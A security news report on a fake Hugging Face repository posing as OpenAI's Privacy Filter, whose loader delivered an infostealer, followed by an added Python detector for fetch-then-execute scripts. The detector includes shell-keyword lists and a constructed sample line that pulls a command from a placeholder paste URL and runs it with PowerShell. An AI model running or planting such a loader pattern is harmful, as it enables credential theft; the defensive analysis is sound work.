A malicious repository impersonating OpenAI’s Privacy Filter project pulled in roughly 244,000 downloads and a number one trending position in under 18 hours before being removed.
The repository, “Open-OSS/privacy-filter,” was identified on May 7, 2026, by researchers at HiddenLayer. Hugging Face took the repo down after HiddenLayer reported it.
The lure was simple but effective. The README copied OpenAI’s legitimate Privacy Filter model card nearly verbatim, even keeping the link to OpenAI’s real model card PDF. The only meaningful difference was a single instruction telling users to clone the repo and run start.bat on Windows, with a python loader.py alternative provided for non-Windows systems.
HiddenLayer noted the Linux and macOS instructions appeared to be part of the lure, rather than a separately verified payload path.
According to HiddenLayer’s analysis, the loader.py file silently fetched a PowerShell command from a public JSON paste service, which then downloaded a second-stage batch script disguised as an Edge updater. That script in turn pulled down the final payload: a 1.07 MB Rust-based infostealer with anti-analysis, anti-VM, and anti-debugging protections built in.
The malware targeted browser credentials, session cookies, cryptocurrency wallets, Discord tokens, FileZilla and FTP credentials, and SSH keys. Exfiltrated data was packaged into JSON and posted to an attacker-controlled domain.
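One way to triage a script such as loader.py before running it, as an added example (not code from HiddenLayer or the original article): it parses the file with Python's ast module, without executing it, and flags the combination the analysis describes, a script that both reaches the network and launches commands. The module lists, the `triage_script` name and the sample input are assumptions constructed for illustration.

```python
import ast

# Heuristic lists assumed for this example; not indicators from HiddenLayer's report.
NET_MODULES = {"urllib", "requests", "httpx", "http", "socket"}
EXEC_FUNCS = {"os": {"system", "popen"},
              "subprocess": {"run", "Popen", "call", "check_call", "check_output"}}
SHELL_WORDS = ("powershell", "cmd.exe", ".bat")

def triage_script(source: str) -> dict:
    """Parse Python source without executing it and report fetch-then-execute traits."""
    tree = ast.parse(source)
    mod_alias, direct = {}, {"exec", "eval"}
    net, execs, shell = set(), set(), set()
    # Pass 1: resolve imports first so aliases like `import subprocess as sp` are caught.
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.name.split(".")[0] in NET_MODULES:
                    net.add(a.name.split(".")[0])
                if a.name in EXEC_FUNCS:
                    mod_alias[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NET_MODULES:
                net.add(node.module.split(".")[0])
            for a in node.names:
                if a.name in EXEC_FUNCS.get(node.module, ()):
                    direct.add(a.asname or a.name)
    # Pass 2: find process-launching calls and shell-related string literals.
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            f = node.func
            if isinstance(f, ast.Name) and f.id in direct:
                execs.add(f.id)
            elif (isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name)
                  and f.attr in EXEC_FUNCS.get(mod_alias.get(f.value.id), ())):
                execs.add(f"{mod_alias[f.value.id]}.{f.attr}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            shell |= {w for w in SHELL_WORDS if w in node.value.lower()}
    return {"network": sorted(net), "exec": sorted(execs), "shell_strings": sorted(shell),
            "suspicious": bool(net and execs)}  # network reach plus command launch

# Constructed sample (placeholder URL, never executed): the shape of a loader that
# pulls a command from a paste-style JSON endpoint and hands it to PowerShell.
CONSTRUCTED_SAMPLE = '''
import json, subprocess as sp
from urllib.request import urlopen
cmd = json.load(urlopen("https://paste.example.invalid/x"))["cmd"]
sp.run(["powershell", "-Command", cmd])
'''
```

A hit is a reason to read the file before running anything from the repository, not a verdict; a loader that builds its module or function names dynamically will evade a static check like this one.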
Inflated Engagement Points to a Wider Supply-Chain Operation
HiddenLayer believes the download count and the 667 “likes” the repo accumulated were largely artificial. It described the engagement as almost certainly inflated, noting that the accounts followed predictable auto-generated naming patterns.
A subset of those accounts also followed a separate user called anthfu, whose six repositories all contained the same malicious loader.py and reused the same command-retrieval URL.
The infrastructure also overlapped with a separate npm typosquatting campaign, documented by security research firm Panther, that delivers the WinOS 4.0 implant, a remote access trojan. The overlap suggests both efforts may be tied to a wider operation targeting open-source ecosystems.
HiddenLayer recommended that anyone who cloned the repository and executed start.bat or loader.py treat the host as fully compromised. Reimaging is the suggested fix, followed by rotation of all stored credentials and invalidation of browser sessions.